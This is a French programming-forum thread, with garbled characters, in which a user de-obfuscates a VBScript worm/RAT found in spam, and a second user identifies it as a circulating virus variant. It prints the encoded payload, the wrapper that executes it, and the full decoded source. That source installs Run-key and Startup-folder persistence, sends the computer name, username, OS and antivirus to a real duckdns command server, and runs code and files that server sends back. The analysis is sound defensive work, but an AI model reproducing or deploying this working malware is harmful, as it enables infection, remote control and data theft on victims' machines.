A|39|37|3A|39|39|3A|31|30|31|3A|34|30|3A|31|31|35|3A|34|30|3A|34|39|3A|34|31|3A|34|34|3A|33|34|3A|31|32|34|3A|38|35|3A|31|32|34|3A|33|34|3A|34|34|3A|33|34|3A|31|32|34|3A|38|36|3A|31|32|34|3A|33|34|3A|34|31|3A|31|33|3A|31|30|3A|31|31|39|3A|31|31|34|3A|34|36|3A|38|37|3A|31|31|34|3A|31|30|35|3A|31|31|36|3A|31|30|31|3A|33|32|3A|31|31|35|3A|34|30|3A|34|39|3A|34|31|3A|31|33|3A|31|30|3A|31|31|39|3A|31|31|34|3A|34|36|3A|36|37|3A|31|30|38|3A|31|31|31|3A|31|31|35|3A|31|30|31|3A|34|30|3A|34|31|3A|31|33|3A|31|30|3A|31|31|35|3A|31|30|34|3A|34|36|3A|31|31|34|3A|31|31|37|3A|31|31|30|3A|33|32|3A|33|34|3A|31|31|39|3A|31|31|35|3A|39|39|3A|31|31|34|3A|31|30|35|3A|31|31|32|3A|31|31|36|3A|34|36|3A|31|30|31|3A|31|32|30|3A|31|30|31|3A|33|32|3A|34|37|3A|34|37|3A|36|36|3A|33|32|3A|33|34|3A|33|32|3A|33|38|3A|33|32|3A|39|39|3A|31|30|34|3A|33|32|3A|33|38|3A|33|32|3A|31|30|32|3A|31|31|37|3A|33|32|3A|33|38|3A|33|32|3A|39|39|3A|31|30|34|3A|34|34|3A|33|32|3A|35|34|3A|31|33|3A|31|30|3A|31|31|39|3A|34|36|3A|31|31|33|3A|31|31|37|3A|31|30|35|3A|31|31|36|3A|31|33|3A|31|30|3A|39|39|3A|39|37|3A|31|31|35|3A|31|30|31|3A|33|32|3A|33|34|3A|36|37|3A|31|30|38|3A|33|34|3A|31|33|3A|31|30|3A|38|37|3A|34|36|3A|31|31|33|3A|31|31|37|3A|31|30|35|3A|31|31|36|3A|33|32|3A|31|33|3A|31|30|3A|39|39|3A|39|37|3A|31|31|35|3A|31|30|31|3A|33|32|3A|33|34|3A|38|35|3A|31|31|30|3A|33|34|3A|31|33|3A|31|30|3A|38|33|3A|34|30|3A|34|39|3A|34|31|3A|33|32|3A|36|31|3A|33|32|3A|31|31|34|3A|31|30|31|3A|31|31|32|3A|31|30|38|3A|39|37|3A|39|39|3A|31|30|31|3A|34|30|3A|38|33|3A|34|30|3A|34|39|3A|34|31|3A|34|34|3A|33|34|3A|33|37|3A|31|30|32|3A|33|34|3A|34|34|3A|31|30|32|3A|31|31|37|3A|34|31|3A|31|33|3A|31|30|3A|38|33|3A|34|30|3A|34|39|3A|34|31|3A|33|32|3A|36|31|3A|33|32|3A|31|31|34|3A|31|30|31|3A|31|31|32|3A|31|30|38|3A|39|37|3A|39|39|3A|31|30|31|3A|34|30|3A|38|33|3A|34|30|3A|34|39|3A|34|31|3A|34|34|3A|33|34|3A|33|37|3A|31|31|30|3A|33|34|3A|34|34|3A|31|31|39|3A|31|31|30|3A|34|31|3A|31|33|3A|31|30|3A|38|33|3A|34|30|3A|34|39|3A|34|31|3A|33|32|3A|36|31|3A|33|32|3A|31|31|34|3A|31|30|31|3A|31|31|32|3A|31|30|38|3A|39|37|3A|39|39|3A|31|30|31|3A|34|30|3A|38|33|3A|34|30|3A|34|39|3A|34|31|3A|34|34|3A|33|34|3A|33|37|3A|31|31|35|3A|31|30|32|3A|31|30|30|3A|31|31|34|3A|33|34|3A|34|34|3A|31|30|30|3A|31|31|34|3A|34|31|3A|31|33|3A|31|30|3A|31|30|31|3A|31|32|30|3A|31|30|31|3A|39|39|3A|31|31|37|3A|31|31|36|3A|31|30|31|3A|33|32|3A|38|33|3A|34|30|3A|34|39|3A|34|31|3A|31|33|3A|31|30|3A|31|31|39|3A|34|36|3A|31|31|33|3A|31|31|37|3A|31|30|35|3A|31|31|36|3A|31|33|3A|31|30|3A|31|30|31|3A|31|31|30|3A|31|30|30|3A|33|32|3A|31|31|35|3A|31|30|31|3A|31|30|38|3A|31|30|31|3A|39|39|3A|31|31|36|3A|31|33|3A|31|30|3A|38|37|3A|34|36|3A|38|33|3A|31|30|38|3A|31|30|31|3A|31|30|31|3A|31|31|32|3A|33|32|3A|35|34|3A|34|38|3A|34|38|3A|34|38|3A|31|33|3A|31|30|3A|31|33|3A|31|30|3A|31|31|39|3A|31|30|31|3A|31|31|30|3A|31|30|30|3A|22|D|A|64|69|6D|20|59|56|4F|78|61|51|74|64|4E|7A|42|48|44|59|55|59|4D|49|52|5A|45|74|71|78|45|D|A|59|56|4F|78|61|51|74|64|4E|7A|42|48|44|59|55|59|4D|49|52|5A|45|74|71|78|45|20|3D|20|22|3A|22|D|A|4F|71|49|67|43|51|67|74|67|50|4A|7A|47|6C|59|57|74|4A|5A|71|62|5A|4E|68|50|3D|53|50|4C|49|54|28|4F|71|49|67|43|51|67|74|67|50|4A|7A|47|6C|59|57|74|4A|5A|71|62|5A|4E|68|50|2C|20|59|56|4F|78|61|51|74|64|4E|7A|42|48|44|59|55|59|4D|49|52|5A|45|74|71|78|45|29|D|A|64|69|6D|20|6A|47|49|6F|64|41|72|4B|53|4C|66|69|4F|54|66|62|59|79|75|6D|47|42|57|45|6D|D|A|6A|47|49|6F|64|41|72|4B|53|4C|66|69|4F|54|66|62|59|79|75|6D|47|42|57|45|6D|20|3D|20|30|D|A|64|69|6D|20|51|51|6E|45|45|51|74|75|47|6E|56|59|57|61|70|73|66|4A|73|64|74|59|54|42|76|D|A|51|51|6E|45|45|51|74|75|47|6E|56|59|57|61|70|73|66|4A|73|64|74|59|54|42|76|20|3D|20|55|42|4F|55|4E|44|28|4F|71|49|67|43|51|67|74|67|50|4A|7A|47|6C|59|57|74|4A|5A|71|62|5A|4E|68|50|29|20|2D|20|31|D|A|46|4F|52|20|44|52|7A|69|6A|45|63|59|4B|63|77|4F|67|50|6F|74|4E|53|48|7A|43|55|58|6E|56|20|3D|20|6A|47|49|6F|64|41|72|4B|53|4C|66|69|4F|54|66|62|59|79|75|6D|47|42|57|45|6D|20|54|4F|20|51|51|6E|45|45|51|74|75|47|6E|56|59|57|61|70|73|66|4A|73|64|74|59|54|42|76|D|A|55|76|70|69|55|4D|4E|57|53|73|6D|72|46|4B|46|55|43|4D|5A|70|4F|70|44|45|44|20|3D|20|4F|71|49|67|43|51|67|74|67|50|4A|7A|47|6C|59|57|74|4A|5A|71|62|5A|4E|68|50|28|44|52|7A|69|6A|45|63|59|4B|63|77|4F|67|50|6F|74|4E|53|48|7A|43|55|58|6E|56|29|D|A|6C|4A|6C|53|77|4D|69|4D|4E|43|75|58|64|52|57|59|71|6E|76|72|43|64|6F|7A|6B|20|3D|20|43|68|72|57|28|55|76|70|69|55|4D|4E|57|53|73|6D|72|46|4B|46|55|43|4D|5A|70|4F|70|44|45|44|29|D|A|72|64|4C|49|75|6C|48|56|72|6D|57|45|49|49|4B|48|79|64|4C|5A|69|4C|4D|68|42|20|3D|20|72|64|4C|49|75|6C|48|56|72|6D|57|45|49|49|4B|48|79|64|4C|5A|69|4C|4D|68|42|20|26|20|6C|4A|6C|53|77|4D|69|4D|4E|43|75|58|64|52|57|59|71|6E|76|72|43|64|6F|7A|6B|D|A|4E|45|58|54|D|A|65|78|65|63|75|74|65|20|28|72|64|4C|49|75|6C|48|56|72|6D|57|45|49|49|4B|48|79|64|4C|5A|69|4C|4D|68|42|29|D|A") 
     
    		set obj4 = getobject("winmgmts:\\.\root\cimv2") 
     
    		set obj5 = obj4.execquery( select * from win32_process ,,48)
     
    		txt1 =  "ljamnfuykx" ' semble être simplement du bruit
    		dim k 
    		Mid txt1,3,3 ' semble être simplement du bruit
     
    		for each k in obj5 
    			 if k.name = "wscript.exe" then
    				ExecuteGlobal(h) 
    			 end if 
    		next 
    	end if 
    next
    On remarque que la variable h re็oit le r้sultat d'une grande chaine de caract่res trait้ par la fonction "fonction1". C'est une seconde ้tape d'encapsulation du code afin de la cacher. Remarquez l'instruction "ExecuteGlobal(h)"
    Voici ce que contient h qui est donc ex้cut้ (j'ai la aussi renomm้ les variables) :
    Code : S้lectionner tout - Visualiser dans une fen๊tre เ part
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    instructionsCodees="39:32:67:111:100:101:100:32:98:121:32:118:95:66:48:49:13:10:79:110:32:101:114:114:111:114:32:114:101:115:117:109:101:32:110:101:120:116:13:10:13:10:106:32:61:32:97:114:114:97:121:40:34:87:83:99:114:105:112:116:46:83:104:101:108:108:34:44:34:83:99:114:105:112:116:105:110:103:46:70:105:108:101:83:121:115:116:101:109:79:98:106:101:99:116:34:44:34:83:104:101:108:108:46:65:112:112:108:105:99:97:116:105:111:110:34:44:34:77:105:99:114:111:115:111:102:116:46:88:77:76:72:84:84:80:34:41:13:10:103:32:61:32:97:114:114:97:121:40:34:72:75:67:85:34:44:34:72:75:76:77:34:44:34:72:75:67:85:92:118:119:48:114:109:34:44:34:92:83:111:102:116:119:97:114:101:92:77:105:99:114:111:115:111:102:116:92:87:105:110:100:111:119:115:92:67:117:114:114:101:110:116:86:101:114:115:105:111:110:92:82:117:110:92:34:44:34:72:75:76:77:92:83:79:70:84:87:65:82:69:92:67:108:97:115:115:101:115:92:34:44:34:82:69:71:95:83:90:34:44:34:92:100:101:102:97:117:108:116:105:99:111:110:92:34:41:13:10:121:61:32:97:114:114:97:121:40:34:11
    9:105:110:109:103:109:116:115:58:34:44:34:119:105:110:51:50:95:108:111:103:105:99:97:108:100:105:115:107:34:44:34:87:105:110:51:50:95:79:112:101:114:97:116:105:110:103:83:121:115:116:101:109:34:44:34:119:105:110:109:103:109:116:115:58:92:92:108:111:99:97:108:104:111:115:116:92:114:111:111:116:92:115:101:99:117:114:105:116:121:99:101:110:116:101:114:34:44:34:65:110:116:105:86:105:114:117:115:80:114:111:100:117:99:116:34:41:13:10:13:10:102:117:110:99:116:105:111:110:32:103:111:40:109:41:13:10:105:102:32:109:61:52:32:116:104:101:110:13:10:84:61:34:119:105:110:109:103:109:116:115:58:92:92:108:111:99:97:108:104:111:115:116:92:114:111:111:116:92:115:101:99:117:114:105:116:121:99:101:110:116:101:114:34:13:10:83:101:116:32:66:61:71:101:116:79:98:106:101:99:116:40:121:40:51:41:41:46:73:110:115:116:97:110:99:101:115:79:102:40:121:40:52:41:41:13:10:102:111:114:32:101:97:99:104:32:97:32:105:110:32:98:13:10:103:111:61:97:46:100:105:115:112:108:97:121:78:97:109:101:13:10:101:120:105:116:32:102:111:114:13:10:110:101:120:11
    6:13:10:83:101:116:32:66:61:71:101:116:79:98:106:101:99:116:40:121:40:51:41:32:38:32:34:50:34:41:46:73:110:115:116:97:110:99:101:115:79:102:40:121:40:52:41:41:13:10:102:111:114:32:101:97:99:104:32:97:32:105:110:32:98:13:10:103:111:61:97:46:100:105:115:112:108:97:121:78:97:109:101:32:13:10:101:120:105:116:32:102:111:114:13:10:110:101:120:116:13:10:105:102:32:103:111:61:34:34:32:116:104:101:110:32:103:111:61:34:78:111:116:45:102:111:117:110:100:34:13:10:101:108:115:101:13:10:83:101:116:32:66:61:71:101:116:79:98:106:101:99:116:40:121:40:48:41:41:46:73:110:115:116:97:110:99:101:115:79:102:40:121:40:109:41:41:13:10:102:111:114:32:101:97:99:104:32:97:32:105:110:32:98:13:10:105:102:32:109:32:61:32:49:32:116:104:101:110:13:10:103:111:61:97:46:118:111:108:117:109:101:115:101:114:105:97:108:110:117:109:98:101:114:13:10:101:108:115:101:105:102:32:109:32:61:32:50:32:116:104:101:110:13:10:103:111:61:97:46:99:97:112:116:105:111:110:13:10:101:110:100:32:105:102:13:10:101:120:105:116:32:102:111:114:13:10:110:101:120:116:13:
    10:101:110:100:32:105:102:13:10:101:110:100:32:102:117:110:99:116:105:111:110:32:13:10:13:10:115:101:116:32:119:32:61:32:87:83:99:114:105:112:116:13:10:115:101:116:32:115:104:32:61:32:67:114:40:48:41:13:10:115:101:116:32:102:115:32:61:32:67:114:40:49:41:13:10:13:10:70:117:110:99:116:105:111:110:32:67:114:40:78:41:13:10:83:101:116:32:67:114:32:61:32:67:114:101:97:116:101:79:98:106:101:99:116:40:106:40:78:41:41:13:10:69:110:100:32:70:117:110:99:116:105:111:110:13:10:13:10:102:117:110:99:116:105:111:110:32:69:120:40:115:41:13:10:69:120:32:61:32:115:104:46:69:120:112:97:110:100:69:110:118:105:114:111:110:109:101:110:116:83:116:114:105:110:103:115:40:34:37:34:38:115:38:34:37:34:41:13:10:101:110:100:32:102:117:110:99:116:105:111:110:13:10:13:10:102:117:110:99:116:105:111:110:32:80:116:40:67:44:65:41:13:10:80:116:61:34:34:13:10:83:101:116:32:88:61:67:114:40:51:41:13:10:88:46:79:112:101:110:32:34:80:79:83:84:34:44:34:104:116:116:112:58:47:47:99:108:105:101:110:116:115:115:108:102:114:100:111:110:46:100:117:99:107:10
    0:110:115:46:111:114:103:58:49:49:54:54:47:34:38:67:44:102:97:108:115:101:13:10:88:46:115:101:116:114:101:113:117:101:115:116:104:101:97:100:101:114:32:34:85:115:101:114:45:65:103:101:110:116:58:34:44:110:102:13:10:88:46:115:101:110:100:32:65:13:10:80:116:61:88:46:114:101:115:112:111:110:115:101:116:101:120:116:13:10:101:110:100:32:102:117:110:99:116:105:111:110:13:10:13:10:70:117:110:99:116:105:111:110:32:110:102:13:10:110:102:61:34:34:13:10:105:61:103:111:40:49:41:13:10:115:61:86:78:32:38:32:34:95:34:32:38:32:105:13:10:110:102:61:110:102:38:115:38:99:13:10:115:61:101:120:40:34:67:79:77:80:85:84:69:82:78:65:77:69:34:41:13:10:110:102:61:110:102:38:115:38:99:13:10:115:61:101:120:40:34:85:83:69:82:78:65:77:69:34:41:13:10:110:102:61:110:102:38:115:38:99:13:10:115:61:103:111:40:50:41:13:10:110:102:61:110:102:38:115:38:99:13:10:115:61:103:111:40:52:41:13:10:110:102:61:110:102:38:115:38:99:38:99:38:110:116:38:99:38:117:38:99:13:10:69:110:100:32:70:117:110:99:116:105:111:110:13:10:13:10:83:117:98:32:78:115:13:10:11
    1:110:32:101:114:114:111:114:32:114:101:115:117:109:101:32:110:101:120:116:13:10:100:114:61:101:120:40:34:85:115:101:114:80:114:111:102:105:108:101:34:41:32:38:32:67:32:38:32:119:110:13:10:102:115:46:67:111:112:121:70:105:108:101:32:102:117:44:100:114:44:116:114:117:101:13:10:13:10:115:104:46:114:101:103:119:114:105:116:101:32:103:40:48:41:32:38:32:103:40:51:41:32:38:32:34:88:83:55:75:74:72:82:75:66:54:34:44:32:67:104:32:38:32:100:114:32:38:32:67:104:44:32:103:40:53:41:13:10:102:115:46:99:111:112:121:102:105:108:101:32:102:117:44:32:67:114:40:50:41:46:78:97:109:101:83:112:97:99:101:40:38:72:55:41:46:83:101:108:102:46:80:97:116:104:32:38:67:32:38:32:119:110:32:44:116:114:117:101:13:10:101:110:100:32:83:117:98:13:10:13:10:100:114:61:101:120:40:34:85:115:101:114:80:114:111:102:105:108:101:34:41:32:38:32:67:32:38:32:119:110:13:10:13:10:13:10:13:10:13:10:13:10:118:110:61:34:99:111:110:110:101:120:105:111:110:34:13:10:85:61:34:34:13:10:13:10:99:104:32:61:32:99:104:114:119:40:51:52:41:13:10:99:32:61:32:99:104:114:1
    19:40:57:50:41:13:10:102:117:32:61:32:119:46:115:99:114:105:112:116:102:117:108:108:110:97:109:101:13:10:119:110:61:119:46:115:99:114:105:112:116:110:97:109:101:13:10:78:84:61:34:78:111:34:13:10:105:102:32:102:115:46:102:105:108:101:101:120:105:115:116:115:40:101:120:40:34:87:105:110:100:105:114:34:41:32:38:32:34:92:77:105:99:114:111:115:111:102:116:46:78:69:84:92:70:114:97:109:101:119:111:114:107:92:118:50:46:48:46:53:48:55:50:55:92:118:98:99:46:101:120:101:34:41:32:116:104:101:110:13:10:78:84:61:34:89:101:115:34:13:10:101:110:100:32:105:102:13:10:13:10:85:61:32:115:104:46:114:101:103:114:101:97:100:40:103:40:50:41:41:13:10:105:102:32:85:61:34:34:32:116:104:101:110:13:10:105:102:32:109:105:100:40:102:117:44:50:41:61:34:58:92:34:32:38:32:119:110:32:116:104:101:110:13:10:85:61:34:84:82:85:69:34:13:10:115:104:46:114:101:103:119:114:105:116:101:32:103:40:50:41:44:32:85:44:32:103:40:53:41:13:10:101:108:115:101:13:10:85:61:34:70:65:76:83:69:34:13:10:115:104:46:114:101:103:119:114:105:116:101:32:103:40:50:41:44:32
    :85:44:32:103:40:53:41:13:10:101:110:100:32:105:102:13:10:101:110:100:32:105:102:13:10:13:10:78:115:13:10:115:112:108:61:34:124:86:124:34:13:10:119:104:105:108:101:32:116:114:117:101:13:10:115:61:115:112:108:105:116:40:80:116:40:34:86:114:101:34:44:34:34:41:44:115:112:108:41:13:10:115:101:108:101:99:116:32:99:97:115:101:32:115:40:48:41:13:10:99:97:115:101:32:34:101:120:99:34:13:10:115:97:61:32:115:40:49:41:13:10:101:120:101:99:117:116:101:32:115:97:13:10:99:97:115:101:32:34:83:99:34:13:10:115:50:32:61:32:69:120:40:34:116:101:109:112:34:41:32:38:32:34:92:34:32:38:32:115:40:50:41:13:10:115:101:116:32:119:114:32:61:32:102:115:46:79:112:101:110:84:101:120:116:70:105:108:101:40:115:50:44:50:44:84:114:117:101:41:13:10:119:114:46:87:114:105:116:101:32:115:40:49:41:13:10:119:114:46:67:108:111:115:101:40:41:13:10:115:104:46:114:117:110:32:115:50:44:32:54:13:10:99:97:115:101:32:34:82:70:34:13:10:115:50:32:61:32:69:120:40:34:116:101:109:112:34:41:32:38:32:34:92:34:32:38:32:115:40:50:41:13:10:115:101:116:32:119:114:32:6
    1:32:102:115:46:79:112:101:110:84:101:120:116:70:105:108:101:40:115:50:44:50:44:84:114:117:101:41:13:10:119:114:46:87:114:105:116:101:32:115:40:49:41:13:10:119:114:46:67:108:111:115:101:40:41:13:10:115:104:46:114:117:110:32:115:50:13:10:99:97:115:101:32:34:82:101:110:34:13:10:115:101:116:32:119:114:32:61:32:102:115:46:79:112:101:110:84:101:120:116:70:105:108:101:40:102:117:44:49:41:13:10:102:32:61:32:119:114:46:82:101:97:100:65:108:108:13:10:119:114:46:99:108:111:115:101:40:41:13:10:102:32:61:32:114:101:112:108:97:99:101:40:102:44:99:104:38:118:110:38:99:104:44:99:104:38:115:40:49:41:38:99:104:41:13:10:115:101:116:32:119:114:32:61:32:102:115:46:79:112:101:110:84:101:120:116:70:105:108:101:40:102:117:44:50:44:102:97:108:115:101:41:13:10:119:114:46:87:114:105:116:101:32:102:13:10:119:114:46:99:108:111:115:101:40:41:13:10:99:97:115:101:32:34:85:112:34:13:10:115:101:116:32:119:114:32:61:32:102:115:46:79:112:101:110:84:101:120:116:70:105:108:101:40:102:117:44:50:44:102:97:108:115:101:41:13:10:115:40:49:41:32:61:3
    2:114:101:112:108:97:99:101:40:115:40:49:41:44:34:124:85:124:34:44:34:124:86:124:34:41:13:10:119:114:46:87:114:105:116:101:32:115:40:49:41:13:10:119:114:46:67:108:111:115:101:40:41:13:10:115:104:46:114:117:110:32:34:119:115:99:114:105:112:116:46:101:120:101:32:47:47:66:32:34:32:38:32:99:104:32:38:32:102:117:32:38:32:99:104:44:32:54:13:10:119:46:113:117:105:116:13:10:99:97:115:101:32:34:67:108:34:13:10:87:46:113:117:105:116:32:13:10:99:97:115:101:32:34:85:110:34:13:10:83:40:49:41:32:61:32:114:101:112:108:97:99:101:40:83:40:49:41:44:34:37:102:34:44:102:117:41:13:10:83:40:49:41:32:61:32:114:101:112:108:97:99:101:40:83:40:49:41:44:34:37:110:34:44:119:110:41:13:10:83:40:49:41:32:61:32:114:101:112:108:97:99:101:40:83:40:49:41:44:34:37:115:102:100:114:34:44:100:114:41:13:10:101:120:101:99:117:116:101:32:83:40:49:41:13:10:119:46:113:117:105:116:13:10:101:110:100:32:115:101:108:101:99:116:13:10:87:46:83:108:101:101:112:32:54:48:48:48:13:10:13:10:119:101:110:100:"
    dim separateur
    separateur = ":"
    instructionsCodees=SPLIT(instructionsCodees, separateur)
    dim i
    i = 0
    dim nbElem
    nbElem = UBOUND(instructionsCodees) - 1
    FOR j = i TO nbElem
    	cur = instructionsCodees(j)
    	letterFromCharCode = ChrW(cur)
    	res = res & letterFromCharCode
    NEXT
    execute (res)
    One more time, ce code a pour seul but de "coder" les instructions. On parcours la variable "instructionsCodees". Chaque nombre donne une lettre via le code ascii. Finalement, on a un texte qu'on ex้cute avec l'instruction "execute (res)"
    Voici ce fameux code (oui on arrive au bout !). J'y ai seulement rajout้ les tabulations afin de le rendre plus lisible :
    Code : S้lectionner tout - Visualiser dans une fen๊tre เ part
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    116
    117
    118
    119
    120
    121
    122
    123
    124
    125
    126
    127
    128
    129
    130
    131
    132
    133
    134
    135
    136
    137
    138
    139
    140
    141
    142
    143
    144
    145
    146
    147
    148
    149
    150
    151
    152
    153
    154
    ' Coded by v_B01
    On error resume next
     
    j = array("WScript.Shell","Scripting.FileSystemObject","Shell.Application","Microsoft.XMLHTTP")
    g = array("HKCU","HKLM","HKCU\vw0rm","\Software\Microsoft\Windows\CurrentVersion\Run\","HKLM\SOFTWARE\Classes\","REG_SZ","\defaulticon\")
    y= array("winmgmts:","win32_logicaldisk","Win32_OperatingSystem","winmgmts:\\localhost\root\securitycenter","AntiVirusProduct")
     
    function go(m)
    	if m=4 then
    		T="winmgmts:\\localhost\root\securitycenter"
    		Set B=GetObject(y(3)).InstancesOf(y(4))
    		for each a in b
    			go=a.displayName
    		exit for
    		next
     
    		Set B=GetObject(y(3) & "2").InstancesOf(y(4))
    		for each a in b
    			go=a.displayName 
    		exit for
    		next
     
    		if go="" then go="Not-found"
    	else
    		Set B=GetObject(y(0)).InstancesOf(y(m))
    		for each a in b
    			if m = 1 then
    				go=a.volumeserialnumber
    			elseif m = 2 then
    				go=a.caption
    			end if
    		exit for
    		next
    	end if
    end function 
     
    set w = WScript
    set sh = Cr(0)
    set fs = Cr(1)
     
    Function Cr(N)
    	Set Cr = CreateObject(j(N))
    End Function
     
    function Ex(s)
    	Ex = sh.ExpandEnvironmentStrings("%"&s&"%")
    end function
     
    function Pt(C,A)
    	Pt=""
    	Set X=Cr(3)
    	X.Open "POST","http://clientsslfrdon.duckdns.org:1166/"&C,false
    	X.setrequestheader "User-Agent:",nf
    	X.send A
    	Pt=X.responsetext
    end function
     
    Function nf
    	nf=""
    	i=go(1)
    	s=VN & "_" & i
    	nf=nf&s&c
    	s=ex("COMPUTERNAME")
    	nf=nf&s&c
    	s=ex("USERNAME")
    	nf=nf&s&c
    	s=go(2)
    	nf=nf&s&c
    	s=go(4)
    	nf=nf&s&c&c&nt&c&u&c
    End Function
     
    Sub Ns
    	on error resume next
    	dr=ex("UserProfile") & C & wn
    	fs.CopyFile fu,dr,true
     
    	sh.regwrite g(0) & g(3) & "XS7KJHRKB6", Ch & dr & Ch, g(5)
    	fs.copyfile fu, Cr(2).NameSpace(&H7).Self.Path &C & wn ,true
    end Sub
     
    dr=ex("UserProfile") & C & wn
     
     
     
    vn="connexion"
    U=""
     
    ch = chrw(34) ' "
    c = chrw(92) ' \
    fu = w.scriptfullname
    wn=w.scriptname
    NT="No"
    if fs.fileexists(ex("Windir") & "\Microsoft.NET\Framework\v2.0.50727\vbc.exe") then
    	NT="Yes"
    end if
     
    U= sh.regread(g(2))
    if U="" then
    	if mid(fu,2)=":\" & wn then
    		U="TRUE"
    		sh.regwrite g(2), U, g(5)
    	else
    		U="FALSE"
    		sh.regwrite g(2), U, g(5)
    	end if
    end if
     
    Ns
    spl="|V|"
    while true
    	s=split(Pt("Vre",""),spl)
    	select case s(0)
    	case "exc"
    		sa= s(1)
    		execute sa
    	case "Sc"
    		s2 = Ex("temp") & "\" & s(2)
    		set wr = fs.OpenTextFile(s2,2,True)
    		wr.Write s(1)
    		wr.Close()
    		sh.run s2, 6
    	case "RF"
    		s2 = Ex("temp") & "\" & s(2)
    		set wr = fs.OpenTextFile(s2,2,True)
    		wr.Write s(1)
    		wr.Close()
    		sh.run s2
    	case "Ren"
    		set wr = fs.OpenTextFile(fu,1)
    		f = wr.ReadAll
    		wr.close()
    		f = replace(f,ch&vn&ch,ch&s(1)&ch)
    		set wr = fs.OpenTextFile(fu,2,false)
    		wr.Write f
    		wr.close()
    	case "Up"
    		set wr = fs.OpenTextFile(fu,2,false)
    		s(1) = replace(s(1),"|U|","|V|")
    		wr.Write s(1)
    		wr.Close()
    		sh.run "wscript.exe //B " & ch & fu & ch, 6
    		w.quit
    	case "Cl"
    		W.quit 
    	case "Un"
    		S(1) = replace(S(1),"%f",fu)
    		S(1) = replace(S(1),"%n",wn)
    		S(1) = replace(S(1),"%sfdr",dr)
    		execute S(1)
    		w.quit
    	end select
    	W.Sleep 6000
    wend

  3. #3
    R้dacteur
    Avatar de omen999
    Profil pro
    Inscrit en
    F้vrier 2006
    Messages
    1 296
    D้tails du profil
    Informations personnelles :
    Localisation : France

    Informations forums :
    Inscription : F้vrier 2006
    Messages : 1 296
    Points : 3 549
    Points
    3 549
    Par d้faut
    bonjour,
    - variante vbscript d'un petit virus qui circule depuis plusieurs mois
    - obfuscation basique pour passer les filtres spam
    - persistance rudimentaire en s'inscrivant dans le r้pertoire d้marrage
    - active un mini serveur http reconnaissant 7 commandes (la boucle finale)
    - connect้ เ un client qui s'est enregistr้ au pr้alable sur duckdns
    - doit permettre d'ex้cuter sur la machine compromise du code vbs ou des binaires
    transmis par le client
    un scriptkiddie qui doit s'ennuyer ferme ou <cynicalmode> un employ้/prestataire de vendeur d'antivirus</cynicalmode>
    nomen omen, nemo non omen - Consultez la FAQ VBScript et les cours et tutoriels VBScript
    le plus terrible lorsqu'une voiture renverse un pi้ton, c'est que ce sont les freins qui hurlent. (ram๓n)
    pas de questions techniques par mp

Discussions similaires

  1. Comment cr้er un formulaire de contact re็u par mail sans php et mailto
    Par lilly91 dans le forum Balisage (X)HTML et validation W3C
    R้ponses: 1
    Dernier message: 14/10/2009, 19h12

Partager

Partager
  • Envoyer la discussion sur Viadeo
  • Envoyer la discussion sur Twitter
  • Envoyer la discussion sur Google
  • Envoyer la discussion sur Facebook
  • Envoyer la discussion sur Digg
  • Envoyer la discussion sur Delicious
  • Envoyer la discussion sur MySpace
  • Envoyer la discussion sur Yahoo